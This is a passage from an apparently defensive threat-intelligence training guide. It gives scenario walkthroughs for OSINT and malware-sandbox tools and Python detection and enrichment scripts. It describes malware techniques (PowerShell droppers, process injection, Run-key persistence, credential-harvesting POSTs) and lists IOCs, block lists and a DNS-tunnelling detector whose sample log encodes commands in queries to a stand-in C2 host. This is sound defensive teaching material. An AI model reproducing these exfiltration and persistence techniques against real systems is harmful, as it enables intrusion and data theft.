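        if version < floor:
            findings.append(("high", f"port {port}: {product} {version_str(version)} "
                                     f"is below baseline {version_str(floor)}"))
    if host.cert_self_signed:
        findings.append(("medium", "self-signed certificate on an internet-facing host"))
    if host.cert_common_name.startswith("*."):
        findings.append(("low", f"wildcard certificate {host.cert_common_name} "
                                "exposes an internal naming pattern"))
    if host.directory_listing:
        findings.append(("medium", "directory listing enabled: information disclosure risk"))
    return findings


# Constructed legacy host: banners mirror the scenario, the IP is a
# documentation address (TEST-NET-3) and the certificate name is a placeholder.
LEGACY_HOST = HostRecord(
    ip="203.0.113.10",
    banners={22: "SSH-2.0-OpenSSH_5.3",
             80: "Server: Apache/2.2.15 (CentOS)",
             443: "Server: Apache/2.2.15 (CentOS)"},
    cert_self_signed=True,
    cert_common_name="*.corp.example",
    directory_listing=True,
)

# Constructed host that meets the baseline, for contrast.
HARDENED_HOST = HostRecord(
    ip="203.0.113.11",
    banners={443: "Server: Apache/2.4.62"},
    cert_self_signed=False,
    cert_common_name="hr.corp.example",
    directory_listing=False,
)

if __name__ == "__main__":
    for severity, finding in assess(LEGACY_HOST):
        print(f"[{severity}] {finding}")
```

Version comparison on tuples avoids the classic string-ordering mistake where "2.2.15" sorts after "2.4.0"; the three "high" findings for the legacy host are the same outdated software the scenario lists, and the hardened host yields no findings.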
Step 5: Actions Taken
Immediate Mitigation:
• Security team contacts the infrastructure team to:
o Take the server offline or place it behind a reverse proxy
o Patch Apache and OpenSSH to the latest versions
o Replace self-signed certificates with trusted CA-signed certs
o Disable directory listing
Long-Term Response:
• Update internal asset inventory to flag legacy servers
• Enforce vulnerability scans and port audits as part of monthly operations
• Schedule full penetration test to ensure proper segmentation and zero external
exposure of internal services
Documentation:
• Save full Shodan scan result as part of vulnerability assessment record
• Link relevant CVEs (e.g., CVE-2017-3167, CVE-2016-0777) in ticketing system
Step 6: Timeline
Time   Action
09:10  Red team initiates Shodan lookup for legacy domain
09:15  Discovery of outdated Apache server and open ports
09:30  Infrastructure team notified, service pulled behind VPN
10:00  Certificates regenerated and host removed from internet-facing scope
CENSYS
Censys is an internet-wide scanning platform that profiles hosts and websites, exposing
TLS/SSL certificate data, open ports, banners and service metadata. It’s used to monitor
external infrastructure and discover hidden assets.
Use Cases:
• Search for domains or IPs associated with your organisation’s certificates.
• Identify rogue or shadow IT infrastructure exposed on the internet.
• Investigate SSL cert misconfigurations or use of deprecated ciphers.
• Perform competitor research or profile threat actor infrastructure.
Practical Application: An analyst queries Censys using the organisation’s wildcard
certificate. The search reveals an untracked staging environment hosted in another
region, which was not recorded in asset inventory. The system is taken under
management and secured.
Scenario Simulation: Discovering Shadow IT with Censys
Context
• Event Type: Asset discovery and external risk assessment
• Objective: Uncover unknown or untracked internet-facing services using TLS
certificate data
• Tool: Censys ([Link])
Step 1: Define the Query
The security team wants to audit all external assets that use the wildcard certificate
*.[Link].
They navigate to Censys and input the search query:
[Link]: "*.[Link]"
This returns any TLS/SSL certificate where *.[Link] or its subdomains are
present in the certificate’s SAN (Subject Alternative Name) field.
Step 2: Censys Returns the Following Results
Result List Includes:
1. [Link] — known production app
2. [Link] — expected
3. [Link] — unknown
4. [Link] — known, but expected to be internal only
Step 3: Deep Dive on Unknown Entry
Focusing on [Link]:
• Censys shows:
o Hosted in Tokyo AWS region
o TLS cert: valid wildcard cert *.[Link]
o Ports open: 80, 443, 22
o Banner on port 80: “Staging API Server – Version 1.3”
o TLS cipher suite: Deprecated TLS_RSA_WITH_3DES_EDE_CBC_SHA
o Self-reported server header: nginx/1.14.0
• Reverse DNS and WHOIS lookup indicate the server was set up 4 months ago
Step 4: Risk Assessment
Identified Issues:
• No entry for this host in central CMDB or asset inventory
• Exposes production wildcard cert in staging
• Weak TLS configuration still in use
• SSH open to the internet
Step 5: Action and Containment
Immediate Actions:
• Infrastructure team contacted to verify legitimacy
• Staging server access restricted to VPN only
• TLS cipher suite upgraded
• Host added to inventory and included in vulnerability scans
Root Cause:
• A regional dev team launched the server without following onboarding process
Step 6: Long-Term Measures
• Enforce centralised certificate issuance and usage logging
• Integrate Censys with weekly asset discovery automation
• Create a rule in SIEM to flag new external-facing domains linked to
*.[Link]
• Issue awareness memo to developers on external exposure and TLS risks
ROBTEX
Robtex provides DNS, IP, domain and routing information to track the relationships
between infrastructure elements. It helps identify co-hosted domains, passive DNS
entries, reverse lookups and other technical metadata.
Use Cases:
• Investigate domain relationships, including A records, MX records, NS records and
WHOIS.
• Track multiple phishing domains hosted on the same IP.
• Discover infrastructure overlaps between different malicious campaigns.
• Support threat actor infrastructure attribution.
Practical Application: While investigating a domain linked to a phishing site, the
analyst uses Robtex to find that multiple scam domains point to the same IP. This
shared infrastructure is reported, blocked and logged in the threat intel repository.
Scenario Simulation: Tracking Phishing Infrastructure Using Robtex
Context
• Event Type: Phishing investigation
• Objective: Identify if multiple malicious domains share infrastructure (e.g. IP
address)
• Tool: Robtex ([Link])
Step 1: Initial Trigger
• A user reports receiving a phishing email pretending to be from secure-payments[.]com.
• The analyst checks the embedded link: [Link]
Step 2: Robtex Domain Investigation
The analyst enters [Link] into Robtex.
Robtex reveals:
• A Record: [Link]
• Hosting ISP: ShadowHosting LLC
• Other domains pointing to the same IP:
o login-safe-banking[.]com
o verifybankingaccess[.]com
o my-appleid-confirm[.]com
• MX Record: No email services configured
• WHOIS: Recently registered, no known organisation
Step 3: Reverse Lookup and Passive DNS
Using Robtex:
• Reverse IP lookup shows multiple phishing domains using the same IP.
• Passive DNS shows that in the last 14 days, domains have changed frequently but
always resolve to [Link].
Step 4: Threat Attribution
Robtex DNS graph view helps map the following:
• All domains linked to the same /24 IP range
• Similar TTL values and DNS provider
• Registered through the same registrar with privacy protection
This pattern matches known threat actor behaviour involving fake banking domains.
Step 5: Response Actions
SOC Actions:
• All discovered domains and IPs are blocked at firewall and email gateway
• IOC list updated in threat intelligence platform
• A SOAR playbook is executed to automate further detection of these patterns
Threat Intelligence Team:
• Tags the infrastructure as "Financial Phishing Cluster Alpha"
• Submits intelligence to partners and threat feeds
Step 6: Automation Recommendation
The SOC team decides to:
• Integrate Robtex API with SIEM to enrich any domain alerts
• Flag alerts for any domain resolving to [Link]/24 for review
[Link]
[Link] offers a suite of tools for DNS analysis, IP geolocation, WHOIS lookup, ASN
queries and DNS propagation testing. It helps analysts inspect and validate domain
infrastructure quickly.
Use Cases:
• Perform WHOIS lookups to determine domain ownership and registration timelines.
• Identify geolocation and ASN of hosting IP addresses.
• Check DNS records for suspicious domains or subdomains.
• Use reverse WHOIS to find other domains registered by the same email.
Practical Application: A newly registered domain flagged in spam filters is
investigated using [Link]. The WHOIS data shows it was registered using a
known threat actor's email and shares a hosting ASN with previously known phishing
sites.
Scenario Simulation: Infrastructure Attribution Using [Link]
Context
• Event Type: Suspicious domain detection from email filters
• Objective: Use [Link] to analyse a flagged domain and identify related malicious
infrastructure
• Tool: [Link]
Step 1: Alert Trigger
A spam filter flags an inbound phishing email. The email contains a suspicious link:
[Link]
SOC Analyst extracts domain:
[Link]
Step 2: WHOIS Lookup with [Link]
Action: Navigate to [Link]
Input: [Link]
[Link] Output:
• Registrant Email: admin@[Link]
• Registrar: NameSilo, LLC
• Registered On: 2025-07-25
• Last Updated: 2025-07-26
• Name Servers: [Link], [Link]
• Status: clientTransferProhibited
Email domain [Link] is linked to prior malicious registrations. The creation date is
recent and suspicious.
Step 3: Reverse WHOIS Search
Action: Navigate to [Link]
Input: admin@[Link]
Output:
• [Link]
• secure-banking247[.]com
• applelogin-auth[.]net
• mailbox-recovery[.]xyz
• All domains registered in the last 60 days
This email is linked to multiple phishing-style domains, all mimicking legitimate services.
Step 4: ASN and IP Geolocation Analysis
Action: Use [Link] and [Link]
IP Analysis:
• IP: [Link]
• ASN: 208046 (AS-DELIS, Russia)
• Hosting Org: Global Layer
The domain is hosted in a known bulletproof hosting ASN used in prior phishing
campaigns.
Step 5: DNS Record Inspection
Action: Navigate to [Link]
Input: [Link]
Output:
• A Record: [Link]
• MX Record: [Link]
• TXT Record: No SPF configured
Domain is live with email receiving enabled, likely for phishing reply or credential capture.
Step 6: Threat Attribution and Response
IOC Summary:
• Domain: [Link]
• Email: admin@[Link]
• IP: [Link]
• ASN: 208046
Response:
• Block domain and IP in proxy, firewall and email gateway
• Tag all domains linked to admin@[Link] as high-risk
• Report findings to threat intel platform
• Add domain and IP to IOC watchlist
• Initiate detection rule update for similar domain patterns
Step 7: Automation Recommendation
• Integrate ViewDNS API to:
o Auto-enrich suspicious domains in SIEM
o Perform WHOIS checks and reverse WHOIS lookups on alert
o Alert on any newly seen domains registered with known threat actor emails
or ASNs
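The two automation recommendations in this chapter (the Robtex one, flagging any domain that resolves into a watched /24, and the ViewDNS one above, alerting on domains tied to a known registrant email or ASN) are the same enrichment step seen from two angles. The block below is an added example that implements both over constructed DNS/WHOIS records; it is not the Robtex or ViewDNS API. The watched network, the registrant email, the sample domain names and the record layout are placeholders; ASN 208046 and the 60-day registration window are taken from the scenario. The cluster_by_registrant function reproduces the reverse WHOIS pivot from Step 3.

```python
"""Enrich a domain alert with infrastructure and registration watchlists.

Added example covering the Robtex recommendation (flag anything resolving
into a watched /24) and the ViewDNS recommendation (alert on domains tied to
a known registrant e-mail or ASN, or registered very recently). Not the
Robtex or ViewDNS API; the record layout, watched network, registrant e-mail
and sample domains are constructed placeholders. ASN 208046 is the one named
in the scenario.
"""
import ipaddress
from collections import defaultdict
from datetime import date

WATCHED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]  # placeholder /24
WATCHED_REGISTRANT_EMAILS = {"admin@attacker-mail.example"}  # placeholder
WATCHED_ASNS = {208046}                                      # from the scenario
NEW_DOMAIN_DAYS = 60   # the scenario treats domains under 60 days old as suspicious


def enrich(record, today):
    """Return the list of reasons this DNS/WHOIS record should be flagged."""
    reasons = []
    for ip_text in record["a_records"]:
        addr = ipaddress.ip_address(ip_text)
        for net in WATCHED_NETWORKS:
            if addr in net:
                reasons.append(f"resolves to {addr} in watched range {net}")
    if record["registrant_email"].lower() in WATCHED_REGISTRANT_EMAILS:
        reasons.append(f"registrant e-mail {record['registrant_email']} is on the watchlist")
    if record["asn"] in WATCHED_ASNS:
        reasons.append(f"hosted in watched ASN {record['asn']}")
    age_days = (today - record["created"]).days
    if age_days < NEW_DOMAIN_DAYS:
        reasons.append(f"registered {age_days} days ago")
    if record["has_mx"] and not record["has_spf"]:
        reasons.append("receives mail but publishes no SPF record")
    return reasons


def severity(reasons):
    """Simple banding: three or more independent signals is high."""
    if not reasons:
        return "info"
    return "high" if len(reasons) >= 3 else "medium"


def triage_all(records, today):
    """{domain: (severity, reasons)} for a batch of records, e.g. from a SIEM alert."""
    return {rec["domain"]: (severity(enrich(rec, today)), enrich(rec, today))
            for rec in records}


def cluster_by_registrant(records):
    """Reverse-WHOIS style pivot: registrant e-mails that own more than one domain."""
    clusters = defaultdict(list)
    for rec in records:
        clusters[rec["registrant_email"].lower()].append(rec["domain"])
    return {email: sorted(domains) for email, domains in clusters.items()
            if len(domains) > 1}


TODAY = date(2025, 8, 5)  # scenario date

# Constructed records; IPs are documentation addresses, ASN 64500 is a
# private-use ASN standing in for a legitimate hosting provider.
SAMPLE_RECORDS = [
    {"domain": "secure-banking247.example", "a_records": ["203.0.113.45"],
     "registrant_email": "admin@attacker-mail.example", "asn": 208046,
     "created": date(2025, 7, 25), "has_mx": True, "has_spf": False},
    {"domain": "applelogin-auth.example", "a_records": ["203.0.113.46"],
     "registrant_email": "admin@attacker-mail.example", "asn": 208046,
     "created": date(2025, 7, 1), "has_mx": False, "has_spf": False},
    {"domain": "mailbox-recovery.example", "a_records": ["198.51.100.7"],
     "registrant_email": "ADMIN@attacker-mail.example", "asn": 64496,
     "created": date(2025, 6, 20), "has_mx": False, "has_spf": False},
    {"domain": "legit-vendor.example", "a_records": ["192.0.2.10"],
     "registrant_email": "hostmaster@legit-vendor.example", "asn": 64500,
     "created": date(2019, 3, 4), "has_mx": True, "has_spf": True},
]

if __name__ == "__main__":
    for domain, (level, reasons) in triage_all(SAMPLE_RECORDS, TODAY).items():
        print(f"{domain}: {level}")
        for reason in reasons:
            print(f"  - {reason}")
    print(cluster_by_registrant(SAMPLE_RECORDS))
```

The ipaddress module does the CIDR containment check correctly for both IPv4 and IPv6, which is easy to get wrong with string prefix matching; the registrant comparison is lower-cased because WHOIS output is not consistent about case.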
HYBRID ANALYSIS
Hybrid Analysis is a malware sandbox platform that can also analyse URLs and files. It
provides dynamic behavioural analysis, network traffic, file system activity and threat
scoring.
Use Cases:
• Submit a suspicious URL to see what it does when executed or opened.
• Observe HTTP requests, dropped files or redirects from the domain.
• Enrich threat reports with behavioural analysis.
• Cross-reference URL activity with MITRE ATT&CK TTPs.
Practical Application: An unknown URL embedded in an email attachment is
submitted to Hybrid Analysis. The scan shows the URL drops a malicious JavaScript
payload and attempts to contact a C2 server. This finding confirms weaponisation and
triggers incident response.
Scenario Simulation: Behavioural Analysis Using Hybrid Analysis
Context
• Event Type: Suspicious email attachment investigation
• Objective: Identify if embedded URL is weaponised and attempts malware delivery
• Tool: Hybrid Analysis
Step 1: Suspicious Email Investigation
SOC team receives a reported email with the following details:
• Subject: “Action Required – Email Quarantine Notification”
• Body contains a button:
Review Message
[Link]
Analyst extracts the embedded URL:
[Link]
Step 2: Submit URL to Hybrid Analysis
Action:
• Navigate to: [Link]
• Click on “Submit Sample”
• Select “Submit URL”
• Input:
[Link]
• Select environment: Windows 10 64-bit, Adobe Reader, Office, etc.
• Enable internet connectivity for live behaviour tracking
Submission ID:
Sample ID: HYA-2025-31342-xyz
Step 3: Observe Dynamic Analysis Results
After a few minutes, Hybrid Analysis completes execution and provides a full behavioural
profile.
Output:
Summary Score:
Malicious (95/100)
Indicators Identified:
1. File Drop:
o [Link] written to %AppData%\Roaming\
o SHA256:
da7c3d89bf192eaeef20387d881b2357c2116fcb13f6ec32fae0171efc111efa
2. Network Connections:
o Outbound HTTP POST to [Link]
o Resolves to same C2 used in secure-banking247[.]com campaign
3. Process Injection:
o [Link] spawns [Link] with obfuscated Base64 payload
4. MITRE ATT&CK Mapping:
o T1059.001 (PowerShell)
o T1071.001 (Web Protocols)
o T1204.001 (Malicious Link in Email)
5. Malware Family:
o Behaviours match AgentTesla loader pattern
Step 4: Malware Analysis
Dropped File Analysis:
• Upload [Link] to VirusTotal and ThreatFox
• Found in multiple recent campaigns tagged as AgentTesla
• Config includes email exfiltration to [Link][.]ru
Persistence Not Observed:
The session was short and ran in an isolated environment — no registry key persistence was set.
Step 5: Response Actions
SOC Actions:
• Block domain [Link] and IP [Link]
• Add hash da7c3d89bf... to EDR/AV blacklist
• Check proxy logs for any user activity to that domain
• Trigger SOAR playbook: phishing link + JS payload detection
• Hunt for execution of [Link] with obfuscated arguments in logs
IR Actions:
• Inspect endpoints with connection attempts to the C2 server
• Quarantine machines executing PowerShell via WScript
Threat Intelligence Actions:
• Add all IOCs to threat feed: URL, hash, domain, IP, TTPs
• Correlate with prior incidents involving AgentTesla variant
Step 6: Automation Recommendation
Integrate Hybrid Analysis API to:
• Auto-submit unknown URLs extracted from email body
• Fetch behavioural summary and alert if:
o File drop observed
o Network connection to known malicious ASN
o MITRE ATT&CK mapping indicates weaponisation
[Link]
[Link] is an interactive malware analysis sandbox that allows live tracking of malware
behaviour, file drops, network communications and C2 activity. It also supports dynamic
URL analysis.
Use Cases:
• Dynamically run a suspicious URL or domain to observe redirects, downloads and
traffic.
• Investigate drive-by download campaigns or malvertising pages.
• Monitor network indicators such as IPs and DNS queries generated by the domain.
• Capture session behaviour for phishing or fake login pages.
Practical Application: An analyst runs a suspicious URL from a reported email inside
[Link]. The analysis reveals it mimics an Office365 login page and captures
credentials entered into the form, confirming it as a phishing site.
Scenario Simulation: Interactive Phishing Site Analysis Using [Link]
Context
Event Type: Phishing site analysis
Objective: Confirm malicious behaviour of a suspicious login page
Tool: [Link]
Step 1: User Report and IOC Extraction
A user reports receiving a suspicious email with a login request impersonating Office 365.
The email body contains:
“Your account has been locked due to unusual sign-in activity. Please verify to restore
access.”
[Verify Now]
[Link]
IOC for analysis:
[Link]
Step 2: Submit URL to [Link] for Interactive Analysis
Action:
• Go to: [Link]
• Create a free account (if not already logged in)
• Click “New Task”
• Select URL and paste:
[Link]
• Choose environment:
o Windows 10 x64
o Office/Adobe enabled
o Network capture enabled
• Click Run (interactive session begins)
Step 3: Execution and Observation
Live session findings:
1. Page Rendered:
o Looks like a clone of Office365 login portal
o Includes company logo loaded from CDN
o Custom JavaScript mimics login form submission
2. Form Capture Behaviour:
o Analyst types test credentials: test_user@[Link] / Test1234
o On submit, JavaScript logs credentials and sends POST request to:
[Link]
3. Network Indicators:
o DNS query for postdata-login365[.]com
o Outbound HTTPS POST to IP [Link]
o No certificate validation on the server
4. MITRE ATT&CK Mapping:
o T1566.002 (Phishing: Spearphishing Link)
o T1056.001 (Input Capture: Keylogging via fake form)
o T1071.001 (Exfiltration over HTTPS)
5. Artifacts Captured:
o Screenshot of phishing page
o PCAP file showing credential exfiltration
o HAR file with browser session details
Step 4: IOC Extraction from [Link]
Extracted from session:
• URL: [Link]
• Phishing collector: [Link]
• IP: [Link]
• Domain similarity: Matches pattern from previously known phishing campaigns (e.g.
[Link])
Step 5: Response Actions
SOC Actions:
• Add [Link] and [Link] to deny list in
DNS/firewall/email gateway
• Block associated IP [Link] across proxy, firewall and endpoint tools
• Alert any users who accessed the domain via proxy logs
• Trigger phishing containment playbook
Threat Intelligence Actions:
• Add all IOCs to internal threat database
• Tag domain under "Office365 Credential Harvesting Campaign"
• Cross-reference domains with Robtex and ViewDNS for infrastructure reuse
Step 6: Automation Recommendation
Integrate [Link] API with email gateway or phishing analysis queue:
• Automatically submit URLs flagged as suspicious
• Extract network activity and credential exfil endpoints
• Use PCAP output for automated IOC generation and correlation in SIEM
THREATMINER
ThreatMiner is an OSINT and threat intelligence repository that allows users to search for
IOCs (domains, IPs, file hashes, URLs) and view their historical associations and campaign
metadata.
Use Cases:
• Look up domain or IP associations with malware families or threat groups.
• Discover historical passive DNS entries.
• Identify shared infrastructure between malicious campaigns.
• Use collected metadata in automated enrichment pipelines.
Practical Application: A domain involved in a credential theft campaign is submitted
to ThreatMiner. The results show it has previously been linked to other AgentTesla
samples and was used in campaigns dating back to 2022. The analyst blocks all
related infrastructure.
Scenario Simulation: Threat Campaign Attribution Using ThreatMiner
Context
Event Type: Credential Theft Investigation
Objective: Identify whether a suspicious domain is part of a known malware campaign
Tool: ThreatMiner
Step 1: Initial IOC Submission
An alert is generated by the email security gateway flagging outbound credentials
submitted to the following URL:
[Link]
The security team suspects this domain is part of a credential harvesting campaign but
needs further context.
Step 2: Search the Domain on ThreatMiner
Action:
• Go to: [Link]
• Input: [Link] into the search bar
• Choose Domain from the drop-down menu
Step 3: ThreatMiner Output
ThreatMiner returns the following data:
1. Passive DNS History:
o Domain previously resolved to:
§ [Link] (Dec 2023)
§ [Link] (Apr 2024)
o Multiple short-lived IPs used
2. Malware Association:
o Domain associated with:
§ AgentTesla samples (MD5: d7f3b728e236472ddda4a9319f59cb2a)
§ Phishing campaigns targeting email providers
o Found in open-source YARA rule matches related to credential stealers
3. Campaign Tagging:
o Linked to “AgentTesla-PhishCluster-2023-Q4”
o Campaign tracked by multiple sources since October 2023
4. WHOIS Info:
o Created using privacy registrar
o Registered in November 2023
o TTL changes match other domains in same campaign
5. Related Infrastructure:
o Other domains found with shared SSL cert fingerprint:
§ webmail-reset-login[.]info
§ securemsg-gateway[.]org
Step 4: IOC Extraction
IOCs Identified:
• Domain: [Link]
• Related Domains:
o [Link]
o [Link]
• Malware: AgentTesla
• Hash: d7f3b728e236472ddda4a9319f59cb2a
• IPs:
o [Link] (internal test IP used in sandbox)
o [Link]
Step 5: Response Actions
SOC Actions:
• Block all listed domains and IPs across the firewall, proxy and endpoint protection
• Perform retroactive search across proxy/DNS logs to identify any previous access
• Correlate identified file hash with endpoint telemetry to detect local infections
• Enrich SIEM correlation rules with the newly identified domains and IPs
Threat Intel Team:
• Update threat intel platform with all IOCs
• Tag infrastructure with "AgentTesla Campaign"
• Notify partner organisations via intelligence-sharing groups
Step 6: Automation Recommendation
Enhancement Plan:
• Use ThreatMiner’s API to automate enrichment of domains or IPs flagged in email
and proxy logs
• Schedule daily IOC lookups and campaign tagging reports
• Automatically flag suspicious domains in SIEM if they appear in known malware
infrastructure clusters
4. SANDBOX AND MALWARE BEHAVIOURAL ANALYSIS
[Link]
[Link] is a cloud-based interactive sandbox for malware and URL analysis. It allows
analysts to dynamically interact with a live malware sample or suspicious URL in real time,
observing system behaviour, process trees, file creation, registry modifications and
network traffic.
Use Cases:
• Analyse phishing attachments or suspicious files by executing them in a controlled
environment.
• Dynamically observe malware behaviour such as command and control (C2)
beaconing, credential harvesting or file encryption.
• Identify dropped files, initiated processes and registry modifications.
• Trace execution flow of malicious scripts, macro-based malware and exploits.
• Investigate URLs embedded in documents or emails to detect redirects and
payload delivery.
Practical Application: A user reports an Excel file received via email. The analyst
uploads the file to [Link] and enables macro execution. The sandbox reveals that
the file spawns PowerShell, downloads a second-stage binary and attempts to
connect to a known malware C2 IP. The findings confirm it is a loader.
Scenario Simulation: Analysing a Suspicious Excel File Using [Link] (Sandbox and Malware Behavioural Analysis)
Context
Event Type: Suspicious Email Attachment
Objective: Determine if the Excel file is malicious and understand its behaviour
Tool: [Link]
Step 1: Incident Trigger
A finance staff member reports a strange Excel file titled Invoice_9987.xlsx received from a
spoofed supplier email.
The user says the file asks to "enable content" (macros) to view the invoice.
Step 2: Upload File to [Link] Sandbox
Action:
1. Analyst logs into [Link]
2. Clicks New Task
3. Uploads Invoice_9987.xlsx
4. Enables Macro Execution
5. Starts the analysis session
Step 3: Observed Behaviour
During the analysis, [Link] reveals the following actions:
• Process Activity:
o [Link] launches
o Spawns [Link]
o PowerShell executes obfuscated command
• Network Activity:
o Outbound HTTP connection to [Link]
o Resolved via malicious-assets[.]cc domain
o Response code: 200 OK (file download successful)
• Dropped Files:
o C:\Users\Admin\AppData\Local\Temp\[Link]
o File hash: a88e3c7cfc8ad9312cda4e8e2a43a1a5
• Registry Modifications:
o Persistence via
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateSvc
• C2 Communication:
o [Link] attempts beaconing to [Link] via HTTP POST every 30
seconds
• Threat Classification:
o [Link] rates behaviour as suspicious (Threat Score: 9/10)
o MITRE Mapping:
§ T1059.001 (PowerShell Execution)
§ T1105 (Ingress Tool Transfer)
§ T1547.001 (Registry Run Key Persistence)
§ T1071.001 (Application Layer Protocol: Web Traffic)
Step 4: IOC Extraction
IOC Type Value
File Name Invoice_9987.xlsx
Dropper Domain malicious-assets[.]cc
IP Address [Link]
C2 Server [Link]
Dropped File [Link]
File Hash a88e3c7cfc8ad9312cda4e8e2a43a1a5
Step 5: Response Actions
SOC Actions:
• Block all IOCs at the firewall, proxy and endpoint protection platforms
• Add hash to EDR blocklist
• Hunt for any process on endpoints that launched [Link] from Excel
• Disable macros org-wide unless digitally signed
• Review email filters for other instances of similar attachments
Threat Intelligence Team:
• Correlate the file hash with known threat actor tools
• Submit sample to VirusTotal and Hybrid Analysis for further reputation correlation
• Enrich threat intelligence platform with MITRE mappings and sandbox results
Step 6: Automation Recommendation
• Integrate [Link]’s API with the SOAR platform to auto-submit suspicious email
attachments for behavioural analysis
• Tag alerts with specific MITRE TTPs based on sandbox results
• Auto-block domains and IPs resolved by malware behaviour when [Link] confirms
threat
JOE SANDBOX
Joe Sandbox is an advanced malware analysis platform that supports multiple operating
systems and offers in-depth static and dynamic analysis. It generates comprehensive
reports detailing malware behaviour, memory manipulation, API calls and persistence
techniques.
Use Cases:
• Submit executables, documents, URLs or archives to observe system changes and
behaviour.
• Analyse obfuscated payloads or custom packers that evade traditional detection.
• Identify sandbox evasion techniques used by malware.
• View process execution graphs, MITRE ATT&CK mappings and API call traces.
• Integrate with SIEM or SOAR platforms to automate malware classification
workflows.
Practical Application: An analyst submits a suspicious MSI installer obtained from a
supply chain email. Joe Sandbox reveals the malware uses a custom packer, injects
into [Link], disables security controls and initiates DNS tunnelling. The analyst
extracts indicators and shares the report with the threat intel team.
Scenario Simulation: Investigating a Malicious Supply Chain Installer Using Joe Sandbox
Context
Event Type: Suspicious MSI Installer
Objective: Analyse the behaviour of an unknown installer and uncover obfuscation or
evasion
Tool: Joe Sandbox
Step 1: Incident Trigger
An employee from the procurement team receives an unexpected MSI installer
(Vendor_Pricing_Tool.msi) from a known supplier’s email address.
The email claims the file contains an updated pricing application.
However, the supplier later confirms they did not send this email.
Step 2: Upload Sample to Joe Sandbox
Action:
1. Analyst logs into Joe Sandbox Cloud
2. Submits Vendor_Pricing_Tool.msi
3. Selects Windows 10 (x64) analysis environment
4. Enables full dynamic and static analysis options
5. Starts scan
Step 3: Joe Sandbox Report Findings
Static Analysis:
• Packer Detected: Custom UPX-like wrapper with anti-debug strings
• Strings Analysis: Obfuscated PowerShell commands, DNS domains, encoded IPs
• Digital Signature: Invalid self-signed certificate, fake CN “Microsoft”
Dynamic Behaviour:
• Process Tree:
o [Link] spawns Vendor_Pricing_Tool.exe
o Spawns hidden [Link]
o Injects code into [Link]
• API Calls:
o Uses VirtualAllocEx, WriteProcessMemory and CreateRemoteThread for
injection
o Calls NetSh to disable Windows Defender’s real-time monitoring
• Network Behaviour:
o DNS queries to:
§ [Link][.]online
§ [Link][.]org
o Traffic pattern indicates DNS tunnelling (long subdomain strings, short TTL)
o No direct HTTP/S beaconing
• Persistence Mechanism:
o Drops script at:
§ C:\Users\Admin\AppData\Roaming\[Link]
o Adds key to:
§ HKCU\Software\Microsoft\Windows\CurrentVersion\Run
• MITRE ATT&CK Mapping:
o T1027 (Obfuscated Files or Information)
o T1055 (Process Injection)
o T1071.004 (Application Layer Protocol: DNS)
o T1547.001 (Registry Run Key Persistence)
o T1089 (Disable Security Tools)
Threat Score: 9.5/10 – High Confidence Malware
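The "long subdomain strings, short TTL" pattern noted above can be turned into a heuristic that scores DNS query logs. This is an added example, not Joe Sandbox code; the log format, the thresholds and the sample lines (using the reserved .example TLD) are assumptions constructed for illustration, and the registered-domain helper is deliberately crude.

```python
"""Flag DNS queries that look like tunnelling: long labels, many labels,
high-entropy subdomains and short TTLs, aggregated per registered domain.

Added example, not Joe Sandbox code. Thresholds and log lines are assumptions.
"""
import math
from collections import defaultdict

# Constructed log lines: "<timestamp> <client> <qname> <qtype> <ttl>"
SAMPLE_DNS_LOG = """\
2025-08-05T10:00:01Z 10.0.0.5 www.example.com A 3600
2025-08-05T10:00:02Z 10.0.0.5 aHR0cDovL3VwbG9hZC5leGU.7f3a9c1e2b4d.c2-tunnel.example A 5
2025-08-05T10:00:03Z 10.0.0.5 Zm9vYmFyYmF6cXV4MTIzNDU2.9e8d7c6b5a4f.c2-tunnel.example TXT 5
2025-08-05T10:00:04Z 10.0.0.5 mail.example.com MX 1800
2025-08-05T10:00:05Z 10.0.0.5 d2hvYW1pIHVzZXIgYWRtaW4.1a2b3c4d5e6f.c2-tunnel.example A 5
"""


def shannon_entropy(text):
    """Bits per character; encoded/encrypted payloads score high, words score low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Crude: last two labels. Production code should use a public-suffix list."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def score_query(qname, ttl):
    """Score one query name; each heuristic that fires adds one point."""
    labels = qname.rstrip(".").split(".")
    subdomain_labels = labels[:-2]
    score = 0
    reasons = []
    longest = max((len(label) for label in subdomain_labels), default=0)
    if longest >= 20:
        score += 1
        reasons.append(f"long label ({longest} chars)")
    if len(subdomain_labels) >= 3:
        score += 1
        reasons.append(f"{len(subdomain_labels)} subdomain labels")
    entropy = shannon_entropy("".join(subdomain_labels))
    if entropy >= 3.5:
        score += 1
        reasons.append(f"high entropy ({entropy:.2f})")
    if ttl <= 60:
        score += 1
        reasons.append(f"short TTL ({ttl}s)")
    return score, reasons


def detect_tunnelling(log_text, min_score=3, min_queries=2):
    """Return {registered_domain: [(client, qname, reasons), ...]} for domains
    that received at least min_queries queries scoring min_score or more."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines instead of crashing the pipeline
        _ts, client, qname, _qtype, ttl = parts
        score, reasons = score_query(qname, int(ttl))
        if score >= min_score:
            hits[registered_domain(qname)].append((client, qname, reasons))
    return {domain: queries for domain, queries in hits.items()
            if len(queries) >= min_queries}


if __name__ == "__main__":
    for domain, queries in detect_tunnelling(SAMPLE_DNS_LOG).items():
        print(domain)
        for client, qname, reasons in queries:
            print("  ", client, qname, "; ".join(reasons))
```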
Step 4: IOCs Extracted
IOC Type Value
File Vendor_Pricing_Tool.msi
Dropped File [Link]
Injected Target [Link]
Domains [Link][.]online, [Link][.]org
Registry Key HKCU...\Run\winupdate
DNS Payload aHR0cDovL3VwbG9hZC5leGU= (Base64 Encoded)
Step 5: Response Actions
SOC Team:
• Block DNS and IP traffic related to *.msapi[.]online and *.syncstore[.]org
• Quarantine endpoints where file was downloaded
• Remove persistence entries and injected processes
• Add MSI hash to endpoint protection deny list
• Isolate potentially compromised user accounts
Threat Intelligence Team:
• Tag behaviour as “Custom Packer / DNS Tunnelling Malware”
• Upload indicators and full Joe Sandbox report to TIP platform
• Correlate with previous campaigns using similar DNS TTPs
Step 6: Automation and Integration
• Integrate Joe Sandbox API into SOAR to:
o Auto-submit new suspicious MSI and EXE files
o Trigger containment playbooks if behavioural score > 8
• Enrich SIEM alerts with Joe Sandbox verdicts and MITRE TTPs
